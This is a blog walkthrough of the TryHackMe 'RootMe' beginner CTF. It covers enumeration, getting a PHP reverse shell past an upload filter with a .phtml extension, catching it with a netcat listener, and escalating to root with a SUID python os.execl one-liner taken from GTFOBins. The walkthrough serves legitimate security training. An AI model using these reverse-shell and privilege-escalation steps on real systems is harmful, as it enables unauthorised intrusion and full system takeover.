TryHackMe — RootMe

Difficulty: Easy

Tag line: A CTF for beginners, can you root me?

Once the VPN is set up, we start our enumeration as normal by pinging the target to ensure that the link is stable enough to complete the challenge.

ping

nmap

Interestingly we only have two ports to worry about. Port 22 (ssh) and Port 80 (http)

gobuster

Although a number of directories were shown, we can highlight two of interest. The first panel and the second uploads So lets check them out.

website

The initial page is a ticker-tape type view.

If we check the panel we see an upload form.

So let’s assume that the uploads will hold these files. Using the pentestmonkey’s php reverse shell we can try to upload the file.

Before we do this make sure that we amend the file to our attacker machine IP and Port address:

Now upload our file.

So not as successful as I would have liked!

Obviously not allowed to upload a .php file. A quick search for valid php file extensions brings up the following:

  • .php
  • .php3
  • .php4
  • .php5
  • .phtml

Let’s try it with .phtml and see if that works.

Great that works. A quick confirmation from visiting the uploads directory confirms this.

foothold

Now we have the reverse shell file uploaded. We need to set up our netcat session. I normally use port 4444 (with 8888 for http server set ups when required.)

┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
  • -n numeric-only IP addresses, no DNS
  • -l listen mode, for inbound connects
  • -v verbose
  • -p port local port number

Once set up you can simply click on the php link on the website, or my preference is to use the curl command.

curl http://$IP/uploads/php-reverse-shell.phtml

From the man command:

curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.

By running the command we get the reverse shell.

┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.56.134] from (UNKNOWN) [10.10.10.174] 34390
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:12:06 up 1:23, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We have a basic shell so let’s make it more interactive.

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z (to background it)
stty raw -echo; fg (brings to foreground - just return twice)

Now we can see the current user from the terminal, and can confirm with id

www-data@rootme:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

escalation

We try to see if www-data has any additional permissions with sudo -l

www-data@rootme:/$ sudo -l
[sudo] password for www-data:

However it requires a password so we need to use other methods to elevate privilege. Checking suid bits may help. This link gives you some more details.

www-data@rootme:/$ find / -perm -4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec

There are a lot of suid files ( I have only shown a few here) but the /usr/bin/python jumps out from the norm.

Checking on GTFOBINS for python, we see that we have a suid option.

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

We just need to ensure that we amend the path and we should be good to go.

www-data@rootme:/$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/root.txt
THM{p*******************}

summary

A really nice room that brough in two areas I was familiar with, GTFOBINS (suid) and php file extensions.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
James Pearson

James Pearson

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.